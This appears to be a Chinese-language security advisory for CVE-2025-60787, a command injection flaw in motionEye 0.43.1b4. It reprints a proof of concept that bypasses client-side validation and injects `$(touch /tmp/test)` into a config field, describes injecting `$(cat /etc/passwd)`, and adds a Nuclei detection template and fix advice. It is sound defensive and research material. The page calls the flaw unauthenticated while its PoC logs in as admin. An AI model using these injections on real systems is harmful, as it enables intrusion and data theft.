[webapps] motionEye 0.43.1b4 - RCE
CVE-2025-60787
motionEye 0.43.1b4 存在命令注入漏洞,允许未认证攻击者通过自定义配置实现远程代码执行。
Critical · CVSS 9.8📋 漏洞基础信息
| CVE | CVE-2025-60787 |
|---|---|
| 漏洞类型 | 命令注入RCE |
| 受影响版本 | motionEye 0.43.1b4 |
| 危害等级 | Critical · CVSS 9.8 |
| 发布日期 | 2026-02-11 |
| 提交者 | prabhatverma47 |
| 来源 | Exploit-DB 原文 ↗ |
🔬 漏洞根因
motionEye 在配置处理中对用户输入的变量未进行充分过滤或转义,导致攻击者可以通过注入 shell 元字符(如反引号、管道符等)来执行任意系统命令。
🎯 攻击场景
1. 攻击者通过 HTTP 请求访问 motionEye 的管理或配置接口。 2. 在自定义配置字段(如 motion 参数、命令执行字段)中注入恶意 payload,例如含有 `$(cat /etc/passwd)` 或管道符 `|` 的命令。 3. motionEye 将配置内容传递给系统 shell 时未做安全处理,导致 payload 被执行。 4. 攻击者在服务器上获得与 motionEye 进程相同权限的命令执行能力。
💥 漏洞影响
攻击者可在未授权情况下远程执行任意系统命令,完全控制服务器,可能导致数据泄露、服务中断、横向移动等严重危害。
⚔️ 原始 PoC
由于原文附带的 PoC 代码被省略,此处无法给出逐步分析。
# Exploit PoC: motionEye RCE via client-side validation bypass (safe PoC)
# Filename: motioneye_rce_poc_edb.txt
# Affected Versions: motionEye <= 0.43.1b4
#
# Short description:
# Client-side validation in motionEye's web UI can be bypassed via overriding the JS validation
# function. Arbitrary values (including shell interpolation syntax) can be saved into the
# motion config. When motion is restarted, the motion process interprets the config and
# can execute shell syntax embedded inside configuration values such as "image_file_name".
#
# Safe PoC: creates a harmless file /tmp/test inside container (non-destructive).
#
# Environment setup:
# 1) Start the motionEye docker image:
# docker run -d --name motioneye -p 9999:8765 ghcr.io/motioneye-project/motioneye:edge
#
# 2) Verify version in logs:
# docker logs motioneye | grep "motionEye server"
# Expect: 0.43.1b4 (or <= 0.43.1b4 for vulnerable)
#
# 3) Access web UI:
# Open http://127.0.0.1:9999
# Login: admin (blank password in default/edge image)
#
# Reproduction (manual + safe PoC):
# A) Bypass client-side validation in browser console:
# 1) Open browser devtools on the dashboard (F12 / Ctrl+Shift+I).
# 2) In the Console tab paste and run:
#
# configUiValid = function() { return true; };
#
# This forces the UI validation function to always return true and allows any value
# to be accepted by the UI forms.
#
# B) Safe payload (paste this into Settings → Still Images → Image File Name and Apply):
# $(touch /tmp/test).%Y-%m-%d-%H-%M-%S
#
# After applying, the PoC triggers creation of /tmp/test inside the motionEye container
# (the "touch" is executed when motion re-reads the config / motionctl restarts).
#
# C) Verify from host:
# docker exec -it motioneye ls -la /tmp | grep test
#
# Expected result:
# /tmp/test exists (created with the permissions of the motion process).
#
# Notes / root cause:
# - UI stores un-sanitized values into camera-*.conf (e.g., picture_filename),
# which are later parsed by motion and interpreted as filenames – shell meta is executed.
# - Fix: sanitize/whitelist filename characters (example sanitization provided in README).
#
# - Original PoC & writeup: https://github.com/prabhatverma47/motionEye-RCE-through-config-parameter
# - motionEye upstream: https://github.com/motioneye-project/motioneye
# - OSV/GHSA advisories referencing this issue (published May–Oct 2025)
# - NVD entries: CVE-2025-60787🔍 Nuclei Detection 模板
以下为漏洞探测模板,用于判断目标是否受影响:
id: CVE-2025-60787-detection
info:
name: motionEye 0.43.1b4 - Detection
author: prabhatverma47
severity: high
description: |
motionEye is a web frontend for the motion daemon.
This template detects motionEye instances vulnerable to CVE-2025-60787.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2025-60787
- https://github.com/prabhatverma47/motionEye-RCE-through-config-parameter
classification:
cve-id: CVE-2025-60787
http:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
words:
- "motionEye"
part: body
- type: status
status:
- 200
- type: regex
regex:
- 'motionEye 0\.43\.1[a-b]?[0-9]*'
part: body
extractors:
- type: regex
name: version
part: body
regex:
- 'motionEye ([0-9]+\.[0-9]+\.[0-9]+[a-zA-Z0-9]*)'🛡️ 修复建议
升级至 motionEye 官方补丁版本(如 >0.43.1b4);临时缓解措施包括限制 motionEye 管理接口的网络暴露范围、配置严格的输入验证和禁止使用 shell 执行配置内容。
📎 参考链接
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-60787
- https://www.exploit-db.com/exploits/52079
- Exploit-DB 原文
⚠️ 本文基于公开漏洞数据库,仅供安全研究与防御参考。生成时间: 2026-05-07 06:44 | 来源: Exploit-DB